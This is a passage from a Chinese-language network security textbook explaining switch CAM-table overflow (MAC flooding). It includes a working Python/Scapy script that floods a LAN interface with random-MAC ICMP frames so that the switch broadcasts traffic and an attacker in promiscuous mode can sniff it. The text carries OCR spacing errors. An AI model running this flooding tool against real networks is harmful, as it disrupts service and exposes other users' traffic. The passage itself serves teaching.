图9-14 集线器应用原理
数据链路层中拒绝服务攻击的方式一般很少为人所熟知。数据链路层拒绝服 务攻击的主要目标为二层交换机。在早期网络中,通常都会使用集线器作为中间 处理设备。集线器属于纯硬件网络底层设备,没有任何“ 智能记忆” 能力和“学
习” 能力,也不具备交换机所具有的MAC地址表,所以集线器发送数据时都是没 有针对性的,而是采用广播的方式发送。也就是说当集线器要向某节点发送数据 时,不是直接把数据发送到目的节点,而是把数据包发送到与集线器相连的所有 节点,如图9-14所示。
当计算机1想要和计算机2通信时,首先计算机1将数据包发给集线器,由集 线器负责转发,但是当集线器不清楚哪个接口连接到了计算机2时,便会用广播 的方式向其他计算机发送数据包,此时如果网络中计算机设置为混杂模式,同样 也会接收到计算机2发送的数据。
交换机相比集线器而言,增加了“ 智能记忆” 能力和“学习” 能力,这两个功能 主要是通过交换机中的CAM表来实现的,这张表中保存了交换机中的每个接口所 连接计算机的MAC地址。
图9-15 交换机应用原理
在应用交换机的局域网环境中,如图9-15所示,计算机1想要和计算机3通
信,会先将数据包发送到交换机上,由交换机提取接收到数据包的MAC地址,并 查询CAM表。如果在CAM表中检索到了对应的MAC地址信息,就将数据包发送 到查询到的MAC地址所对应的接口。如果没有查询到,再将数据包发往所有接口 相连接的主机。交换机的这项功能保证了局域网中交换机发送的数据包是以单播 形式传送的。但是CAM表是有一定限制的,在短时间内收到大量不同的源MAC 地址数据包时,CAM可能因为瞬间无法处理而溢出。溢出之后再次接收到的数据 包就会覆盖前面的条目,导致正常的数据包无法找到正确的对应关系,只能将数 据包广播出去,路由器的“ 智能记忆” 能力和“学习” 能力失效。此时攻击者只需要 在自己的计算机上将网卡设置为混杂模式,就能监听整个网络的数据。
综上所述,数据链路层的拒绝服务攻击其实就是通过伪造请求主机的MAC地 址信息,使得交换机内部CAM短时间填满,失去交换机本身的记忆功能,退化成
集线器,当接收到正常数据包时,会将全部数据以广播的形式发送出去,此时若 攻击者将自己的主机设置为混杂模式,就可以监听网络中的其他主机接收的数据 了。下面通过Python脚本分析这一功能。
1)构造随机的MAC地址和IP ,此处主要是利用Scapy自带的库函数 RandMAC() 和RandIP() ,如下代码是生成随机的MAC地址:
| from scapy .all import * import time while(1) : packet=Ether(src=RandMAC(),dst=RandMAC()) time .sleep(1) print(packet.summary()) |
| 执行结果如下所示: |
 |
| 2)当路由器接收到包含随机生成的IP地址和MAC地址的数据包时,交换机 查询CAM ,若不存在该信息,就会不断进行记录。短时间内,大量请求会导致 CAM被填满,失去交换机原有的功能。下面以ICMP数据包为例:
|
from scapy .all import *
import optparse
def attack(interface) :
pkt=Ether(src=RandMAC(),dst=RandMAC())/IP(src=Rand IP(),dst=Rand IP())/ ICMP()
sendp(pkt,iface=interface)
def main() :
parser=optparse .OptionParser("%prog "+"-i interface")
parser .add_option( '-i ',dest= 'interface ',default= 'eth0 ',type= 'string ', help= 'Interface ')
(options,args)=parser .parse_args()
interface=options .interface
try:
while True:
attack(interface)
except Keyboard Interrupt :
print( '------------- ')
print( 'Finished! ')
if __name__== '__main__ ' :
main()
执行结果如下所示:
